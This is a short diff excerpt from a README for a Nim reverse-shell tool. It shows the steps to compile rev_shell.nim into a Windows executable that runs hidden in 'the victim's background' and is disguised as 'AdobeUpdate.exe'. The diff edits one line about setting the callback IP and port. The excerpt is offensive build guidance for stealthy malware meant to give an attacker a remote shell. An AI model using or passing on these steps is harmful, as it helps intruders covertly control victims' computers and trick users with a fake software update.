beatenyou/Nim-Reverse-Shell/README.md

 sudo apt install nim
 ```

 The code can be compiled in various ways using Nim.
 In this example, the code is compiled to EXE using MinGW and runs in the victim's background once executed (thanks to the "--app:gui" flag).
-Update IP and port
+Update IP and port or when executing.

 ```bash
 nim c -d:mingw --app:gui --opt:speed -o:AdobeUpdate.exe rev_shell.nim